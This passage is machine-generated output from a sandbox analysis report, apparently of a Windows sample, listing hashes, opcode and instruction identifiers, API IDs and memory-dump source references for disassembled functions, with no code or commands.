                                                                                                          • Opcode ID: cf544509813e290d1fe305b6ed588265bafe356c3c06b66d96e85f8fc0105e35
                                                                                                          • Instruction ID: aa4fe24152c52a858318c677d95a7a0c2cd254ae91a73a2a1ffc4a6790d9ff85
                                                                                                          • Opcode Fuzzy Hash: cf544509813e290d1fe305b6ed588265bafe356c3c06b66d96e85f8fc0105e35
                                                                                                          • Instruction Fuzzy Hash: C1419C38258351DFD3049F38E85066AB7E0FB4A315F0998BDD4C683361D37A99A5CB06
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID: gfff
                                                                                                          • API String ID: 2994545307-1553575800
                                                                                                          • Opcode ID: df44e3619374106ad262fc43b683f6ef326694f7b728e93f5ec5f7c0b4c5e613
                                                                                                          • Instruction ID: 2386a0911aa688524989a8340c90167ef89acf6b9e7633cd49b65fbe482c82f4
                                                                                                          • Opcode Fuzzy Hash: df44e3619374106ad262fc43b683f6ef326694f7b728e93f5ec5f7c0b4c5e613
                                                                                                          • Instruction Fuzzy Hash: AA31C371614645CFD728CF28C9517EBB7E6ABDA304F44853ED086CB351EB349444CB86
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: SUQ
                                                                                                          • API String ID: 0-2651150828
                                                                                                          • Opcode ID: 14005623d6de7249a8b851f33e9c3310cb894edf402dd1a84a64b2ad003841e7
                                                                                                          • Instruction ID: 42c55c053425e0b0fbc475bcc9400de1786cc42e84e4724c7975db07e5bacbf3
                                                                                                          • Opcode Fuzzy Hash: 14005623d6de7249a8b851f33e9c3310cb894edf402dd1a84a64b2ad003841e7
                                                                                                          • Instruction Fuzzy Hash: EE21B1706083818FC714CF28C4A07ABBFE2AFD6328F188A5DE5E547392D335C4498766
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: j
                                                                                                          • API String ID: 0-2137352139
                                                                                                          • Opcode ID: c71afa6b20323cbab2bb37583566809d1d087a9fa354429759ce03f3baf40deb
                                                                                                          • Instruction ID: f136246ef15f79f812ec07c1db461e86a52f6259eac92e8ccd6656980116f0fb
                                                                                                          • Opcode Fuzzy Hash: c71afa6b20323cbab2bb37583566809d1d087a9fa354429759ce03f3baf40deb
                                                                                                          • Instruction Fuzzy Hash: 902124316083928AD3258F36945076BBBD5DFD7304F18889EE5C5AB382CB7884028B5A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 'C
                                                                                                          • API String ID: 0-1959375024
                                                                                                          • Opcode ID: 15b3dceed2422b8a86bb36206473813b246add45689b2aad14f1ff44a5455306
                                                                                                          • Instruction ID: 6a2eb9f9bc051ac7585a28991c81e0efb8283155a37514e0de2331f159ba5eab
                                                                                                          • Opcode Fuzzy Hash: 15b3dceed2422b8a86bb36206473813b246add45689b2aad14f1ff44a5455306
                                                                                                          • Instruction Fuzzy Hash: 6401283070C3618FC715CF69E5C0227BBE2EBD6300F1891AAD8D49B216C679C90A879F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: X|T
                                                                                                          • API String ID: 0-2625694639
                                                                                                          • Opcode ID: f300bed5bc34852233b1656f5377e06bb0b50d32563c744d353c8ad641e09496
                                                                                                          • Instruction ID: d1cbbd9272d1375db2703005e1fbf4b2755e8cb02be92dc54b6a5afa885c6bec
                                                                                                          • Opcode Fuzzy Hash: f300bed5bc34852233b1656f5377e06bb0b50d32563c744d353c8ad641e09496
                                                                                                          • Instruction Fuzzy Hash: 01014477E997A48FD3485F749CC607BB2E0EB47705F0A183DEDC9AB280C5659D00D648
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 21f1b8bd8a719ddbe8c4ea0fcc52d12380974d4c75bee49ea26b480580b85d0b
                                                                                                          • Instruction ID: 40a78145a15ed7abd580535788d63f0ce19baa41bfbb966a4b0a28bc3c900fb3
                                                                                                          • Opcode Fuzzy Hash: 21f1b8bd8a719ddbe8c4ea0fcc52d12380974d4c75bee49ea26b480580b85d0b
                                                                                                          • Instruction Fuzzy Hash: 33428C759183518BD724CF28C850BBBB7E2EB97304F1A887DD4C297292D738D941CB9A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a92be46bfed57546a5f9e8b5510e386b31214c144960992f720f2d1649aaaf3f
                                                                                                          • Instruction ID: 4f29358fa94e60aeb1969c962f0f8eec6781083342835fdf5c39f23cee3708bd
                                                                                                          • Opcode Fuzzy Hash: a92be46bfed57546a5f9e8b5510e386b31214c144960992f720f2d1649aaaf3f
                                                                                                          • Instruction Fuzzy Hash: E512213AB58351CFC704CF68E8D026AB7E2FB8A314F0A847DD58587361D7789855CB86
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 37d0343cc3af12e6bb456e5885e59e5124fa04285dfd488beedb1d99f790847e
                                                                                                          • Instruction ID: b00a11197861395ebb150adc986e88646148ed7565683f65526ca2b7b29a586a
                                                                                                          • Opcode Fuzzy Hash: 37d0343cc3af12e6bb456e5885e59e5124fa04285dfd488beedb1d99f790847e
                                                                                                          • Instruction Fuzzy Hash: DD128631A0C7118BD724DF58D8816ABB3E1FBC4305F29893ED986A7281D738B915CB87
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 880181682152cefa616323442b3c08a8c19c815d652fdf005f09e039cb8f0775
                                                                                                          • Instruction ID: abfb7d9fc99d8245844b88641aefb67395d9c82b051767d5b5d882fb86d86362
                                                                                                          • Opcode Fuzzy Hash: 880181682152cefa616323442b3c08a8c19c815d652fdf005f09e039cb8f0775
                                                                                                          • Instruction Fuzzy Hash: 5D02203AB98351CFC704CF68E8D026AB7E2FBCA314F09887DD58587361D6789855CB86
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: febe07f69bc876771bab25917fe72384a5a6eec81e691b45ef341aed95466dd1
                                                                                                          • Instruction ID: 977cdf3f0cd69d8d458b49495e96b3aa17e1ec8412a9fe5b35dbe338883eb9b2
                                                                                                          • Opcode Fuzzy Hash: febe07f69bc876771bab25917fe72384a5a6eec81e691b45ef341aed95466dd1
                                                                                                          • Instruction Fuzzy Hash: 2BE11F39798351CFC304CF68E89122AB7E2FB8A314F09887DD58687362D778D895CB46
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 67b6be940e8b4a5ed499f10148e1713795b6d2de84a6bd2cd6f9f296fc740115
                                                                                                          • Instruction ID: 4c2b0347f53e4351c48a861a59ba72d78d96e03e5b29047675d502fe45a0e231
                                                                                                          • Opcode Fuzzy Hash: 67b6be940e8b4a5ed499f10148e1713795b6d2de84a6bd2cd6f9f296fc740115
                                                                                                          • Instruction Fuzzy Hash: 6EE12139758351CFC708CF68E89062AB7E2FB8A314F09887DD58587362D778D895CB46
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: c4178331c597e52e0b1ee20046c642d28e059b11c8c3ebee6e332c9964e1181a
                                                                                                          • Instruction ID: be10e8665051b82c00c08677856a35fb821d43083445774c7d177a85f24fb323
                                                                                                          • Opcode Fuzzy Hash: c4178331c597e52e0b1ee20046c642d28e059b11c8c3ebee6e332c9964e1181a
                                                                                                          • Instruction Fuzzy Hash: 26C12772B042209BD7149F24DC8267BB3F1EFA1314F5A842EE89597391E37CED05839A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a13086f3fd905cad84177ff2bb7480d5109ce7f5ef2fc61a8cf37152f7f3d0dc
                                                                                                          • Instruction ID: 046a7b96ccfc149aed725a1963e6503e11e8b1bcba22f1082ba47fe7bcb8cccf
                                                                                                          • Opcode Fuzzy Hash: a13086f3fd905cad84177ff2bb7480d5109ce7f5ef2fc61a8cf37152f7f3d0dc
                                                                                                          • Instruction Fuzzy Hash: 46C1AE32A483109BD724DF25CC8172BB7A2ABCA314F19A53EE99567381D378DC01C79A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a68e25a27f3798b9ef751d0f11ca36a322ddebae79407f9de9656c32baca57b4
                                                                                                          • Instruction ID: 3e46ab952dc263d79a64f3095437ed38b519a89b60fb8defccb58f8934dfbd56
                                                                                                          • Opcode Fuzzy Hash: a68e25a27f3798b9ef751d0f11ca36a322ddebae79407f9de9656c32baca57b4
                                                                                                          • Instruction Fuzzy Hash: 98D1203A6583508FC304CF78E89126BBBE2FBCA314F09887DE98587361D678D955CB46
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 3539716f565202b330ba76939f0e2d4d50aead702ee76b1c8be5a3672c50f991
                                                                                                          • Instruction ID: e9ede8447672369631e443a496d4183c01172dbdfa4dcc616eca2a96a95990bf
                                                                                                          • Opcode Fuzzy Hash: 3539716f565202b330ba76939f0e2d4d50aead702ee76b1c8be5a3672c50f991
                                                                                                          • Instruction Fuzzy Hash: D2D1203A758340CFC708CF68E89166AB7E2FB8A314F09887DD58587362D778D895CB46
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 0d1a6229bbe16b85bfd67a1033bc9a6a0ebf70d07d3f0463925b7d3b15b6d579
                                                                                                          • Instruction ID: 7060ff257f1d57e8326384c3aaed6f283346be69202c19536aca7bdb8c3aaad4
                                                                                                          • Opcode Fuzzy Hash: 0d1a6229bbe16b85bfd67a1033bc9a6a0ebf70d07d3f0463925b7d3b15b6d579
                                                                                                          • Instruction Fuzzy Hash: B0815774E04224CBDF20CF54D8916AF73B1FF55310F18819DD8856B385E7389912CBA9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: 11d321e5ccd940af602ca8ba1001a7aaad8d8f990ec326c4c672754488b02dbe
                                                                                                          • Instruction ID: 0bfc5a374a60af3586e218f93e2c2928d82f03b66c5554fb0b2c1f037090387e
                                                                                                          • Opcode Fuzzy Hash: 11d321e5ccd940af602ca8ba1001a7aaad8d8f990ec326c4c672754488b02dbe
                                                                                                          • Instruction Fuzzy Hash: CC911435A083019FE714CF18D891A2BB3E2EFD9710F19952DEA858B3A5DB35DC11CB4A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a9ead859f0848f669d2e829078559d8ec03b56143b4f448b9ced0e895ec2f484
                                                                                                          • Instruction ID: b66e43f3b97cf1dfe37cda8ef161d74f150199c18f2f0b2dd8126107ca88f700
                                                                                                          • Opcode Fuzzy Hash: a9ead859f0848f669d2e829078559d8ec03b56143b4f448b9ced0e895ec2f484
                                                                                                          • Instruction Fuzzy Hash: C77134756482009BE7148F29DC8172F73A6EFC9304F19983EE68657296DB788C01DB5A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: d3db7b38915ac6ba1d39507d845bd541b0533e411939310bf36cc07f58a00772
                                                                                                          • Instruction ID: b6c6c0bb9063e71726147574d8d4a9f3fa072b62720395db4690d828467e09fc
                                                                                                          • Opcode Fuzzy Hash: d3db7b38915ac6ba1d39507d845bd541b0533e411939310bf36cc07f58a00772
                                                                                                          • Instruction Fuzzy Hash: 5B613432F442108BD7209F69D8C126BB7A2ABD9320F1E953ED8C4B7315D6799C5287C6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: cc66f1a2bb9c2a7dccc74bf005c160ac6a51bbee258682b17d2ee790622564db
                                                                                                          • Instruction ID: fd324c467d0d4d67cb19f0be7c245ecd171908bcd495dc43fa11a230d99e3a73
                                                                                                          • Opcode Fuzzy Hash: cc66f1a2bb9c2a7dccc74bf005c160ac6a51bbee258682b17d2ee790622564db
                                                                                                          • Instruction Fuzzy Hash: 7D61E7B5E01226CBCB148F54C861ABEB7B1FF56310F19829DD8466F391E7389841CB98
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 194e4a91e1514fd88c03bb3a50c0e52568d82f3eb187bc583a51a911f9df439c
                                                                                                          • Instruction ID: 923e9729d5fc7ee5fd359d95a093cefa7cc461975f18bb850f02f0498ccbdfb7
                                                                                                          • Opcode Fuzzy Hash: 194e4a91e1514fd88c03bb3a50c0e52568d82f3eb187bc583a51a911f9df439c
                                                                                                          • Instruction Fuzzy Hash: C2413D32B183604BC724CF39889112BF7D69BCA204F19993EDCD6DB386D634ED068785
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 71a9930f6141a572d33e06cb3c5a38f27cfcee272b5f5079e0f2ab4ef3a0a6f8
                                                                                                          • Instruction ID: 0b4fe86eeb8762ab361a5b54057d890833e111ea9fd28b0abc4707cf8fce0a7e
                                                                                                          • Opcode Fuzzy Hash: 71a9930f6141a572d33e06cb3c5a38f27cfcee272b5f5079e0f2ab4ef3a0a6f8
                                                                                                          • Instruction Fuzzy Hash: 5C417CB2A043006BE7109E15DC41B3BB7A9DFC4704F19543DF98693351D679EC00C69B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 3a84865ad5c54ca8c24b5999745df1c13fc6cbfcb28eafabd1d82927ec86d330
                                                                                                          • Instruction ID: 98624231f7e5e9230921b97ae011ab3bf41f8733fbbdbc26380a3e149101f663
                                                                                                          • Opcode Fuzzy Hash: 3a84865ad5c54ca8c24b5999745df1c13fc6cbfcb28eafabd1d82927ec86d330
                                                                                                          • Instruction Fuzzy Hash: 893197B01493418BC714DF29D8616ABBBF1EF83364F144A1DE5D28B390E778C881CB8A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: df0a194b946229767b7363f831e7da5b443bcd7695956afead878a2f9a9ff157
                                                                                                          • Instruction ID: 2de86218718c271af5024ca1516ac4d3c10d72851b4fdaea6f89b2b7420df16b
                                                                                                          • Opcode Fuzzy Hash: df0a194b946229767b7363f831e7da5b443bcd7695956afead878a2f9a9ff157
                                                                                                          • Instruction Fuzzy Hash: 6831A977E4032807C32C8D7D9C912A5F552ABC8120F2F833ECCAA97782E8744F0A41C4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: 9da7e709b599e80dc5169ae302d838208e408c8766e6f691f40b63be7d058f75
                                                                                                          • Instruction ID: 0e1e8af2c2204aea15d5cbc23395958ecdeab842d00133b4e92973e96d65c682
                                                                                                          • Opcode Fuzzy Hash: 9da7e709b599e80dc5169ae302d838208e408c8766e6f691f40b63be7d058f75
                                                                                                          • Instruction Fuzzy Hash: 343168327587284FC3209E7CAD8133A76D2EBD5314F5E163AC8A0D72A2E274CD018ACD
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: 61a7c5f3e3e1a8c8aa4b562ae2fa7e0dfe5b8cfecbd878ad23e9407211e519b2
                                                                                                          • Instruction ID: 8b2346cda91f544e30954989f53522bf0f7333ed1d7757e56fe87add5a417945
                                                                                                          • Opcode Fuzzy Hash: 61a7c5f3e3e1a8c8aa4b562ae2fa7e0dfe5b8cfecbd878ad23e9407211e519b2
                                                                                                          • Instruction Fuzzy Hash: 73117B369483089FD7209F50DC90937B7A2EBA9304F04943DE98523311E2369D109746
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: b67144eb7c8d87826bf8fb626f82679e5028b600b171b9cc6fc605f5a26fb581
                                                                                                          • Instruction ID: 3e731032b9ba81a520a52e62ad974797521f0b7710f777a06b965f9240a14ebe
                                                                                                          • Opcode Fuzzy Hash: b67144eb7c8d87826bf8fb626f82679e5028b600b171b9cc6fc605f5a26fb581
                                                                                                          • Instruction Fuzzy Hash: F8212474A28601CBD71CCF28C8509BBF7A2EBEB300F59947EC043D32A5E938D485C64A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                          • Instruction ID: 68b9c81565d08f8e27d3b5cdfdde0d7ccd40a41e6fcafbbcd0beb1d44a1560b9
                                                                                                          • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                          • Instruction Fuzzy Hash: 06112933A045D40EC31A8D3C8400665BFE30AB7236F5D939AF4B89B2D2D6268DCA8759
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 76c433cb550cfda3216090b31964c4cf69b73a36e8cd3125cab870c4421485a6
                                                                                                          • Instruction ID: 0869e638d739f0c9dc1f77a8d382a8f2a9bb23b5c0a6dc3e537d6bd1b3fecd10
                                                                                                          • Opcode Fuzzy Hash: 76c433cb550cfda3216090b31964c4cf69b73a36e8cd3125cab870c4421485a6
                                                                                                          • Instruction Fuzzy Hash: 4B01B5F1B0136147D720DE55F4C1B27B2A9AF85708F58043ED40957342DBBAFC08C299
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 01f10ef63025d853010bbcd235c1ddb8abbacb0ba491801d8f95867e39bd8927
                                                                                                          • Instruction ID: d899a92072081549aacd0a373389c60e53af17a8a0474f1d80352f716c791a12
                                                                                                          • Opcode Fuzzy Hash: 01f10ef63025d853010bbcd235c1ddb8abbacb0ba491801d8f95867e39bd8927
                                                                                                          • Instruction Fuzzy Hash: 98012821B0D7608BD319CB69A49132BFBD2DBEA704F18985ED0DBD7310D928CD02479E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a4891f18ca3c17b38bf2b15199dfd40243cf34308cd727dcd2b612a98463f970
                                                                                                          • Instruction ID: 571c051b1a7b4a12d511d6b327af5e60c1d357793d73ac2cbf614903c133d6ad
                                                                                                          • Opcode Fuzzy Hash: a4891f18ca3c17b38bf2b15199dfd40243cf34308cd727dcd2b612a98463f970
                                                                                                          • Instruction Fuzzy Hash: 1001D8756592508BE3084F96E49077B73A9EB8F301F19783EC481576C2C3389C128B4F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 8f638a3506d36bf050616cf4e3f80a7ef195994cbd757f6b5d36e659fde1be3a
                                                                                                          • Instruction ID: b2d8b3f25d2a6363043d8991c3fea2fcaa9534d5848f355d0d58bc03b07a957b
                                                                                                          • Opcode Fuzzy Hash: 8f638a3506d36bf050616cf4e3f80a7ef195994cbd757f6b5d36e659fde1be3a
